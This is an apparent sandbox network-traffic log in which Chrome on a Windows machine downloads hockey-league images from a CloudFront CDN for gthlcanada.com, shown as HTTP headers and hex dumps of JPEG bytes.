                                                                                                                          2025-01-13 21:01:18 UTC6517INData Raw: be 1c 41 e3 6f 0f 6b b7 fa 85 c3 ea 10 da 34 57 4b 16 cd 92 a4 8d 90 51 54 82 0a 0f 5a e4 e1 ee 27 af 99 62 de 1e ad 34 95 9b ba bf 46 bb fa 9d 7c 49 c2 78 7c af 06 b1 34 6a 36 f9 92 b3 b7 54 fb 7a 1f 70 f8 77 58 d4 f5 ef d8 4e f3 55 d6 2e 1e ea ee 5f 06 6a 6a f2 c8 77 3b f9 76 b3 46 a5 98 f2 4e d5 19 27 93 d4 d7 e7 75 e9 42 97 12 46 10 56 5e d6 3a 7a c9 33 f4 cc 3d 59 d5 e1 79 54 a8 ee fd 94 b5 f4 8b 47 c0 3f b2 87 ec a9 e1 3f da 03 c2 ba d6 bd e2 2d 66 fb 4d 97 4c bd 5b 64 4b 51 11 56 53 1a be 4f 98 ac 73 93 8e 2b f4 de 23 e2 2a f9 5d 68 52 a5 04 d4 95 f5 bf 7b 74 3f 29 e1 7e 18 c3 e6 d4 2a 55 ad 52 51 71 76 d2 dd af d5 1a 9e 10 f0 27 fc 33 ff 00 ed bf e1 ff 00 01 78 57 55 b8 b8 b4 17 16 d0 bc b2 e1 5e 58 6f 2d c3 49 1c 81 30 ac 32 dc 71 d4 03 d4 66 b1
                                                                                                                          Data Ascii: Aok4WKQTZ'b4F|Ix|4j6TzpwXNU._jjw;vFN'uBFV^:z3=YyTG??-fML[dKQVSOs+#*]hR{t?)~*URQqv'3xWU^Xo-I02qf


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          83192.168.11.204989854.239.153.1384431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:18 UTC663OUTGET /app/uploads/gthl/2022/11/22115759/IMG_6412-e1729706741707-730x420.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:18 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 57890
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:19 GMT
                                                                                                                          Last-Modified: Wed, 23 Oct 2024 18:05:46 GMT
                                                                                                                          ETag: "5ab7d753310be7140088fdb96b9ce6fa"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 cdb7a265f783ce0c07661e9c6820c2c4.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: 0Uzl4PV9gSp4474kjEkCyxEzdYWe4Y_q5oJiMBSXgxlIswjUz9h1hg==
                                                                                                                          2025-01-13 21:01:18 UTC15897INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 03 2c 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 09 01 0f 00 02 00 00 00 06 00 00 00 7a 01 10 00 02 00 00 00 10 00 00 00 80 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 90 01 1b 00 05 00 00 00 01 00 00 00 98 01 28 00 03 00 00 00 01 00 02 00 00 01 32 00 02 00 00 00 14 00 00 00 a0 02 13 00 03 00 00 00 01 00 01 00 00 87 69 00 04 00 00 00 01 00 00 00 b4 00 00 00 00 43 61 6e 6f 6e 00 43 61 6e 6f 6e 20 45 4f 53 20 32 30 30 30 44 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 32 30 32 32 3a 31 31 3a 31 39 20 30 35 3a 35 33 3a 35 30 00 00 23 82 9a 00 05 00 00 00 01 00 00 02 5e 82 9d 00 05 00 00 00 01 00 00 02 66 88 22 00 03 00 00 00 01 00 02 00 00 88 27 00 03 00 00 00
                                                                                                                          Data Ascii: JFIFHH,ExifMM*z(2iCanonCanon EOS 2000DHH2022:11:19 05:53:50#^f"'
                                                                                                                          2025-01-13 21:01:18 UTC16384INData Raw: f3 a1 21 d3 94 6d d7 b1 23 d2 a9 6a 16 29 ac 5e ce 3e 48 59 5e db 92 5b c3 d8 36 36 3b 76 23 d2 9f c6 50 dc d0 9e 4a 5a 8b 37 48 2e e0 74 0d 1b a1 07 a1 07 20 8a 8a e5 04 db a9 23 e9 59 7f 06 c9 a9 5b f3 c5 3b bf 80 a0 72 fa 0a 71 3c 5b 63 a6 b8 8e e6 78 d0 b7 40 4d 15 93 74 07 8c 9e fe 11 25 ac f1 b6 e0 a3 03 fb 56 7b f0 d7 44 f1 38 80 de b3 15 86 03 9c 11 f8 ab 42 bb d4 2d ee b4 f9 ee 60 64 71 e1 b1 ca f4 e9 4a 5c 37 78 da 76 99 1c 6f 85 72 4b 37 eb 5b 78 b0 f3 91 8b 91 2f 04 6c 96 f2 e9 d3 c6 17 95 3a 52 c6 bb 67 15 b5 d1 68 31 c8 dd 85 2f 41 ae 90 46 1b f9 d5 ef b4 c5 da 61 9b 24 57 42 18 dc 59 8a 52 4d 1d 2c 8d 19 ca 9a b3 14 ef 72 a4 73 60 8a a4 ad cc 40 ab b6 aa 91 3e 58 63 35 6c e3 6a c5 8b 2b ce 25 52 72 6a 05 90 92 43 51 5b 88 61 9c e4 36 3f 5a
                                                                                                                          Data Ascii: !m#j)^>HY^[66;v#PJZ7H.t #Y[;rq<[cx@Mt%V{D8B-`dqJ\7xvorK7[x/l:Rgh1/AFa$WBYRM,rs`@>Xc5lj+%RrjCQ[a6?Z
                                                                                                                          2025-01-13 21:01:18 UTC16384INData Raw: 7f d2 84 60 95 b5 ee 33 93 66 45 c6 7a 8b 4f ac 92 40 49 25 7c 10 3d a9 e7 81 65 4b 68 18 49 17 38 65 eb e9 59 5f 10 5e 8b fe 36 92 24 39 58 9b 1b 7a d6 bb c2 70 f2 d9 1d ba 8a d5 2f c2 8a 97 60 1d 53 5e 9e de fa 55 5e 60 8a db 57 c8 35 76 d5 01 8d d3 2b df 34 c3 7d a0 89 5d d8 c4 09 3b e7 15 49 34 75 b4 38 54 0a 6a 94 d0 d4 43 a5 69 f0 ad ca 72 c6 06 f5 f3 8f b4 56 b9 d2 c5 c1 c1 8a 36 04 8a 29 a6 44 16 e4 6d 40 be 26 ea 92 69 fa 72 c6 ae 79 65 60 0a d1 5d a2 3e 8a dc 19 68 6e 6e 51 63 03 a6 d4 d7 7d 0b 22 cb 6d cc aa ec 30 73 4b 7c 04 92 4b 2c 6d 1b 72 90 b9 a9 78 b2 ea fa 3d 51 99 32 71 b6 d4 d9 d2 93 af 60 43 4a c5 fd 57 80 1b 95 e6 82 4c b6 e6 95 ad b4 9b f8 2e b9 09 7c 86 c6 29 e3 4f d6 ef 25 9f c2 74 6c 7b d1 68 6c e3 92 e5 5c a0 c9 34 89 25 d8 4a
                                                                                                                          Data Ascii: `3fEzO@I%|=eKhI8eY_^6$9Xzp/`S^U^`W5v+4}];I4u8TjCirV6)Dm@&irye`]>hnnQc}"m0sK|K,mrx=Q2q`CJWL.|)O%tl{hl\4%J
                                                                                                                          2025-01-13 21:01:18 UTC2106INData Raw: 7d f1 59 7e 89 a0 ce 22 b2 b8 9a e1 92 69 08 7c 63 a0 ad c3 5d d1 be db b0 bb b7 0c 06 23 ce 3d 6b 2f bf b9 56 e2 31 6b 17 f7 76 a8 b1 ed eb de 9b 1d b9 52 62 cb 5b 34 58 a3 7b 9b 08 9e 49 0b be db 9f 6a 40 d7 e5 d5 1f 53 99 e2 66 08 0e 14 7b 56 95 a5 59 4a fa 3a dd ed e1 a7 5f 5a 14 f2 59 c8 5b 98 29 39 ef 55 cd 2b a4 15 fc 99 9c da e6 ad 64 be 62 4e 3a e6 b8 b6 e3 4d 41 db 1e 18 23 d6 b4 3b ad 1b 4f d4 a3 68 d5 13 98 8f 4a 0b 6d c0 f1 24 9c ae 46 33 d2 a2 8a f7 09 6e d2 49 2f 34 79 2e 71 87 08 49 f6 da b3 0b 1d 52 63 7c 5a 39 db 25 fa 83 ef 5b 0e bd 66 34 ad 0e 78 61 38 1e 09 1b 7d 29 23 82 74 2b 7b 08 e1 33 c2 af 24 9e 7c 91 d2 ad c7 26 b4 90 ad 6e d8 f5 a9 6b 46 2d 01 4b 49 e2 f2 c4 33 eb 9c 52 29 e2 d5 5f c5 03 0a 72 92 c1 2e 2d 9d 24 5e 55 66 fe 54
                                                                                                                          Data Ascii: }Y~"i|c]#=k/V1kvRb[4X{Ij@Sf{VYJ:_ZY[)9U+dbN:MA#;OhJm$F3nI/4y.qIRc|Z9%[f4xa8})#t+{3$|&nkF-KI3R)_r.-$^UfT
                                                                                                                          2025-01-13 21:01:18 UTC1024INData Raw: da b8 89 3e fd 3e b4 b7 63 d1 35 df c9 34 b2 45 7a b9 8d e3 23 e8 71 48 1a 3d c4 73 6b 52 04 de 28 bc a3 1e 82 9a 38 c2 f5 6c ac 6e e7 3f 91 0d 23 70 43 17 0f 2b 6e 5b 24 9a b7 12 ed 95 b6 3b f1 06 a2 d7 76 70 bd bc 42 32 be 52 00 eb 49 f2 4b a8 5c 4e a8 33 82 71 b5 38 7c bb cf 69 85 19 c7 b5 73 6b a5 bc 51 19 1e 3d f3 8c e2 93 a6 1e ca f6 d6 e6 3b 74 56 eb 8a 96 e1 40 8a 3e 6d 94 1d ea c9 42 05 57 bd 03 c3 40 7d 0d 44 c2 c5 2d 66 c6 ca d7 57 92 7b 4c 15 9c 2e 7e b4 4b 51 ba b5 4d 1d 1a de 32 b2 26 cf ee 69 7a f6 e8 36 ae f0 29 d9 0e f4 71 e1 f1 6c b9 40 ce c2 8b 5e 91 2c 58 b8 d6 59 b6 e5 39 27 15 da 40 b3 a0 77 5c 31 ef 56 ae 34 a1 ce 18 a6 02 d5 84 84 78 79 03 14 a8 20 c3 a7 4e 01 78 7c c0 76 ef 5c c5 74 f1 12 1b 2a c3 af b5 1d 82 3c 46 7d c1 a4 bd 42
                                                                                                                          Data Ascii: >>c54Ez#qH=skR(8ln?#pC+n[$;vpB2RIK\N3q8|iskQ=;tV@>mBW@}D-fW{L.~KQM2&iz6)ql@^,XY9'@w\1V4xy Nx|v\t*<F}B
                                                                                                                          2025-01-13 21:01:18 UTC6095INData Raw: 0a 8b cb 54 21 bc e6 9f 19 ef 4b 74 02 bc a8 3c 49 49 c6 ce 45 50 ba 65 59 39 41 fa e2 a6 7b 87 92 fa 48 e3 52 cc 5c 95 50 3a 9e df ce af cb c3 6d 67 60 6e 2e 9f 37 0c 72 54 1f c3 59 65 d8 c0 d8 49 c6 57 61 ea 7b d5 a8 9c a0 c4 49 cc 7b b3 77 a8 d6 38 97 f2 ef ee 73 56 21 c3 26 dd aa 11 92 2b ca f8 f1 24 24 0e 8a bb 0a b3 14 b8 35 5f 1b 0d ab ea ee 70 33 50 88 62 d2 df 9d c0 ff 00 d9 ad 0b 49 55 5b 75 3b 6e 2b 31 d3 0b a3 81 fa d6 8f a2 16 68 53 de 8a 00 cb a4 72 a3 19 64 38 8d 01 76 3d 80 1b d7 e7 9d 77 53 fb 63 5a be bf 27 ff 00 a8 9d e4 1f 42 76 fe 55 b2 f1 c6 b2 34 2e 0a bf 95 1b 96 6b 90 2d a3 fa b7 5f e5 9a c0 44 86 a3 22 2d 73 6f 5d 24 c1 6a a7 8a 07 7e b5 c3 ce 31 80 71 ef 40 2c 27 0d db 4d 70 ac 3f 0c 67 09 ee de bf a5 18 7b d0 62 30 89 39 54 0f
                                                                                                                          Data Ascii: T!Kt<IIEPeY9A{HR\P:mg`n.7rTYeIWa{I{w8sV!&+$$5_p3PbIU[u;n+1hSrd8v=wScZ'BvU4.k-_D"-so]$j~1q@,'Mp?g{b09T


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          84192.168.11.204989954.239.153.764431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:18 UTC443OUTGET /app/uploads/gthl/2023/05/02161525/START-HOCKEY-1080x1080-Start-Somewhere-320x320.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:18 UTC494INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 37230
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:18 GMT
                                                                                                                          Last-Modified: Tue, 02 May 2023 20:15:27 GMT
                                                                                                                          ETag: "424cf4d71d15d9541b3400e0f07a228b"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Hit from cloudfront
                                                                                                                          Via: 1.1 65515d7b1028cd133489fb761d35fa06.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: b0V8cVqRaSFjvuQz7XTR8O9omJpxsctQHfySF5gOcnxqX3JqvdhfIA==
                                                                                                                          Age: 1
                                                                                                                          2025-01-13 21:01:18 UTC15890INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 02 00 26 00 26 00 00 ff db 00 43 00 03 02 02 02 02 02 03 02 02 02 03 03 03 03 04 06 04 04 04 04 04 08 06 06 05 06 09 08 0a 0a 09 08 09 09 0a 0c 0f 0c 0a 0b 0e 0b 09 09 0d 11 0d 0e 0f 10 10 11 10 0a 0c 12 13 12 10 13 0f 10 10 10 ff db 00 43 01 03 03 03 04 03 04 08 04 04 08 10 0b 09 0b 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ff c0 00 11 08 01 40 01 40 03 01 22 00 02 11 01 03 11 01 ff c4 00 1d 00 00 01 05 01 01 01 01 00 00 00 00 00 00 00 00 00 04 03 05 06 07 08 02 01 09 00 ff c4 00 4c 10 00 02 01 02 05 02 03 06 02 07 05 06 04 03 09 00 01 02 03 04 11 00 05 06 12 21 07 31 13 41 51 08 14 22 61 71 81 32 91 15 23 42
                                                                                                                          Data Ascii: JFIF&&CC@@"L!1AQ"aq2#B
                                                                                                                          2025-01-13 21:01:18 UTC16384INData Raw: 0b 73 71 71 7c 37 b4 b4 c9 c4 22 65 23 92 37 7f 96 3b 8a 78 c9 f8 16 66 f2 23 8c 51 68 ec 53 31 44 bd 64 e0 aa b4 a6 d6 fe f6 11 7c d2 68 da c9 2e e3 d8 9c 7b 3c 4a 8b b6 50 ec 6d fd e1 c6 07 f0 d1 7c dc 7a e0 80 05 51 24 2e df 3b a9 53 62 d7 1e 67 68 fe 98 f5 73 aa 96 7b 5d 0d bd 57 b6 38 97 6d 81 dd c8 02 c4 a6 12 12 6e 7e 5c 30 f4 e7 05 94 76 21 b3 da a8 2f 6b 5a e3 57 26 42 84 00 ca 93 37 6b 70 4a 8f e5 8c e2 dd f1 a2 3d a9 f2 e9 de af 2c cd 04 c5 a0 f0 bd df c3 3d 95 ae 5a e3 9f 3b 73 f4 18 cf 26 51 b1 93 62 93 7e 0e 3e a5 d1 e7 b1 dc 32 36 b4 ed 77 ef bb fc 50 c7 60 9b 43 38 dc 6c 30 4e 5f 43 57 5f 28 8a 97 2d a8 ac 6e 51 56 14 66 6d c7 b7 00 1f cb 03 4a 4f 96 0e c8 b5 46 a3 d2 f3 4d 3e 9d ce ab 32 e9 2a 23 31 4a 69 e5 28 5d 0f 91 b6 38 fc 6d cf 63
                                                                                                                          Data Ascii: sqq|7"e#7;xf#QhS1Dd|h.{<JPm|zQ$.;Sbghs{]W8mn~\0v!/kZW&B7kpJ=,=Z;s&Qb~>26wP`C8l0N_CW_(-nQVfmJOFM>2*#1Ji(]8mc
                                                                                                                          2025-01-13 21:01:18 UTC4956INData Raw: 46 23 63 14 8c 02 b4 9d ee 14 71 cf 38 bd 6d 40 45 25 54 a4 cc 69 82 2b 30 17 2a 23 26 c7 eb e5 86 9a bc ce e5 a8 f2 58 e1 a8 9a fb 64 da d6 11 fa 9e 78 e0 e1 e9 9a 9e b2 27 8d 25 68 de e1 b8 6b 5b cf f8 e0 1a ca 73 43 11 14 f0 ac 81 94 00 2e 77 59 7c 8e 2d bb ea ad c0 a4 72 fc 8e 0a 06 35 73 4f 1c b5 04 96 32 3f 21 7d 6d fd 70 ac 54 d2 54 99 1c 2d 91 89 d9 e4 49 fe f1 1e 5f 2f 5e f8 b8 74 5e 45 91 cb d3 ad 3d 4d 51 d3 35 d4 99 a6 ae a8 cd 62 79 1a a0 c5 51 4a b4 c8 a6 33 0b dc 22 da e5 cd c1 bd ad 89 36 92 9f 48 e7 f4 5d 2f cb 6b 3a 6f a6 a9 64 d4 d9 a5 45 2d 74 d1 53 b8 72 94 ce 8a 39 2c 7f 15 ce ee 39 f2 b6 16 e9 48 24 fe 7f 3a 23 6c 60 e8 a8 04 8b dd 84 15 62 30 ac d0 96 f9 dc 0e df 7e 70 b4 94 be ee c2 a6 94 aa 17 bb a6 d4 b0 17 ee 3f 3c 5f 3a 97 a7
                                                                                                                          Data Ascii: F#cq8m@E%Ti+0*#&Xdx'%hk[sC.wY|-r5sO2?!}mpTT-I_/^t^E=MQ5byQJ3"6H]/k:odE-tSr9,9H$:#l`b0~p?<_:


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          85192.168.11.204990154.239.153.1384431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:18 UTC663OUTGET /app/uploads/gthl/2024/10/10123452/IMG_7761-e1728578153211-730x380.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:18 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 58210
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:19 GMT
                                                                                                                          Last-Modified: Thu, 10 Oct 2024 16:35:58 GMT
                                                                                                                          ETag: "0086c3b9b8e62a82dbeeff358f329fea"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 0f954bea3b233fb0b6e1981b1e8b6bd8.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: jNJPhaLF_gozft2fa1kKF4ozbqNzcGdsJ1d2a3-EwQtuuMsyuj2AxA==
                                                                                                                          2025-01-13 21:01:18 UTC15897INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 03 2c 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 09 01 0f 00 02 00 00 00 06 00 00 00 7a 01 10 00 02 00 00 00 10 00 00 00 80 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 90 01 1b 00 05 00 00 00 01 00 00 00 98 01 28 00 03 00 00 00 01 00 02 00 00 01 32 00 02 00 00 00 14 00 00 00 a0 02 13 00 03 00 00 00 01 00 01 00 00 87 69 00 04 00 00 00 01 00 00 00 b4 00 00 00 00 43 61 6e 6f 6e 00 43 61 6e 6f 6e 20 45 4f 53 20 32 30 30 30 44 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 32 30 32 33 3a 31 31 3a 32 36 20 30 30 3a 33 31 3a 35 35 00 00 23 82 9a 00 05 00 00 00 01 00 00 02 5e 82 9d 00 05 00 00 00 01 00 00 02 66 88 22 00 03 00 00 00 01 00 06 00 00 88 27 00 03 00 00 00
                                                                                                                          Data Ascii: JFIFHH,ExifMM*z(2iCanonCanon EOS 2000DHH2023:11:26 00:31:55#^f"'
                                                                                                                          2025-01-13 21:01:18 UTC93INData Raw: 00 99 d0 49 d2 dd 2f 04 56 50 2f ad a0 5d 4a 50 a2 a3 7b 79 42 3c d2 e3 65 25 25 29 ef 0c 42 2e 96 56 a2 bb 92 0f 84 da 0c d8 69 1f 29 d4 f9 c1 1f e5 b6 c9 cc 72 a1 1a ed a4 36 1c c7 43 6a 60 a3 5d 6f e5 08 63 c1 97 7b 1d 4d af 08 15 9e 61 42 ec 6f b0 3d a3 ce 07 dc 21 27 40 35
                                                                                                                          Data Ascii: I/VP/]JP{yB<e%%)B.Vi)r6Cj`]oc{MaBo=!'@5
                                                                                                                          2025-01-13 21:01:18 UTC16384INData Raw: d3 a4 24 94 bb cd 52 96 2f 61 a4 31 1c b3 c7 f6 5b 6b 88 b3 8e 22 df b4 61 b5 11 d8 e5 b7 f2 8c c5 1d 45 a3 5b e3 ca a5 d7 89 e7 17 60 5f 0d 34 d5 cf 7b a8 9f b5 a3 24 6f 4b de 31 68 f5 7a 79 5c 10 00 e5 3a ed 05 77 c2 a8 55 69 16 b9 82 ab c6 8b db 6d 21 1d 32 8e a8 6e eb 6a 71 0a 58 49 b2 48 b9 ed 0d f9 6a ed 17 9c 2f 43 4c f6 09 c4 33 4e 27 c6 94 25 c6 bb f8 14 2f f6 26 2a 7c a6 7f e2 1f a4 6a ed 68 f3 5d 4d b6 cd 6a 4f 8f d8 a1 8a 9b d3 36 e6 c9 95 fc 96 f9 47 ac 6d 98 1f 89 34 fc 73 28 92 c2 c2 26 00 f1 b4 77 06 33 5e 19 4a e1 34 e0 67 cc e1 97 71 d2 92 b7 82 ed 98 69 14 ee 16 ba ef ff 00 12 d0 69 08 58 96 2e 2a e9 1b 04 5e 3b 1b bd 9c 0d ea ce ae 6d 4e 20 69 ac 18 4a 25 d5 67 59 ca 63 3c c6 3c 63 a5 e0 fa c3 74 c7 92 56 a2 3c 6a 4f e9 89 1a 1f 13 68
                                                                                                                          Data Ascii: $R/a1[k"aE[`_4{$oK1hzy\:wUim!2njqXIHj/CL3N'%/&*|jh]MjO6Gm4s(&w3^J4gqiiX.*^;mN iJ%gYc<<ctV<jOh
                                                                                                                          2025-01-13 21:01:18 UTC15596INData Raw: 16 3b 88 ad d2 68 72 d5 dc 74 89 49 90 10 c2 d5 fb 40 c2 6c 12 40 e8 0f 9c 7a af 2f 86 72 a8 fb 1a ff 00 0e 65 da 96 c2 52 01 08 2d dd 2a 58 41 dc 6b 16 25 bc 33 95 ad 42 d6 b2 61 0a 74 8c b5 3e 5d 12 88 2a 09 6c 65 1e 90 0e 4a ae e4 95 5c 12 2d 71 1f 11 96 4a 59 25 27 e4 f6 a2 a9 50 af 3c 84 12 16 9d fa f6 85 42 ee 01 ce de be 71 1f f0 a4 3a 54 e9 3c be 80 18 f7 c2 32 34 0a 55 bd e2 24 a2 5f 1c 1c a5 6b 6b 00 74 07 ad e0 c0 e9 a4 78 6a 35 8f bf e0 f0 00 1a da 25 65 9b 08 64 5b 73 e5 11 5a 13 e6 22 d7 41 c3 95 2a d3 48 32 ac 28 a7 6c c7 68 cb 25 b3 af a5 94 53 76 31 48 2a 20 01 68 9e 92 a1 54 67 99 2e cb 49 ba eb 68 dd 49 49 b4 69 1c 39 e0 e3 73 b3 6a 7a b3 67 10 9d 90 36 8d c6 9f 87 e9 b4 59 54 ca 4a ca b6 86 c0 b5 ad 10 b0 b9 1d 6f ad 8c 2f b7 93 91 da
                                                                                                                          Data Ascii: ;hrtI@l@z/reR-*XAk%3Bat>]*leJ\-qJY%'P<Bq:T<24U$_kktxj5%ed[sZ"A*H2(lh%Sv1H* hTg.IhIIi9sjzg6YTJo/
                                                                                                                          2025-01-13 21:01:18 UTC5587INData Raw: 7e b0 ed 8e ca ff 00 0f f0 72 30 76 14 90 a3 3c e2 5f 79 80 a2 b5 a7 62 a2 a2 74 fa c5 88 ca 31 fb a9 82 87 99 27 45 01 1e 33 0c ed 9d 30 08 f7 c2 32 3f 48 b4 01 95 66 e3 c2 20 3e 29 a0 34 71 3f 58 0f 8c 6b fe 22 7e b0 00 3f 0a d7 ee 88 2f c1 b1 d8 40 89 a6 ce cb 4c 61 1c 77 e2 b5 6e 8d 5e 6e 81 41 9e 54 93 6d b4 95 cc 3c c8 01 6a 52 b6 17 e8 00 b6 dd e1 a5 6e 84 dd 1a de 2f c4 b4 2c 13 4a 35 2a b3 85 0d 66 09 42 10 2e b7 15 d9 23 ac 66 55 ef c4 3d 16 56 6a 49 34 a9 15 cc 4b af 2a e6 1d 5e 8a 42 7a a4 0e aa f7 8c 0e a1 57 9f ac b9 cc 9f 9f 9c 9d 76 f7 ce fb 8a 59 1e 97 84 44 b4 db aa 09 4c bb ca b0 b8 ca 83 78 ae d4 2d 9a 45 57 8c 18 b7 19 cd 4e d1 a9 72 e0 b1 3d 76 d8 69 86 ca 5c 42 41 bd f3 03 bd 86 bd 37 82 53 b8 3f 5e 98 69 97 ab f5 79 4a 34 ab 60 a8
                                                                                                                          Data Ascii: ~r0v<_ybt1'E302?Hf >)4q?Xk"~?/@Lawn^nATm<jRn/,J5*fB.#fU=VjI4K*^BzWvYDLx-EWNr=vi\BA7S?^iyJ4`
                                                                                                                          2025-01-13 21:01:18 UTC4653INData Raw: 4a 3f 68 00 76 00 8f 78 40 d6 12 1e b7 81 24 94 ee 21 08 35 db ed 01 e0 1b 26 12 b1 ef bf 68 12 83 6b 13 0c 05 80 49 be 80 47 ac 3c a0 89 d0 5a 0d 78 40 0e 91 e3 68 0d 23 c6 00 06 08 55 65 68 04 18 8b c1 4a 45 fc e0 a0 07 99 de d0 25 57 1b c2 76 d6 da c0 91 a5 b5 80 01 2b d2 d6 f7 80 4b 84 f6 bc 14 29 03 72 74 83 05 02 6c 12 40 ef 00 c3 85 9d 8c 0e 6d 21 2c c4 1d e3 c5 7e 66 1d 08 56 e4 c7 88 30 97 34 0d 6f 00 5e 55 c8 cd ff 00 48 54 31 42 93 7b ed 1e 28 30 98 78 91 a1 30 21 d2 7a 98 28 42 84 6b 01 60 4d e0 a1 d5 1d 41 80 2e 12 6f 73 00 06 cb 6e 90 16 1d 6c 21 35 39 7e fe 70 52 b2 37 3d 7b 43 01 43 97 ca 00 a4 01 a9 10 91 51 56 e6 08 73 10 53 fc 4c 2a 01 43 6f de 17 10 52 13 af 8a d0 82 f3 00 06 6f a6 b0 9d 9c cd 62 e7 48 00 72 52 00 bd ef 04 52 52 7b 42
                                                                                                                          Data Ascii: J?hvx@$!5&hkIG<Zx@h#UehJE%Wv+K)rtl@m!,~fV04o^UHT1B{(0x0!z(Bk`MA.osnl!59~pR7={CCQVsSL*CoRobHrRRR{B


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          86192.168.11.204990254.239.153.764431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:18 UTC425OUTGET /app/uploads/gthl/2024/11/13195651/HHOF23_ShootSaveCall_300x250.gif HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
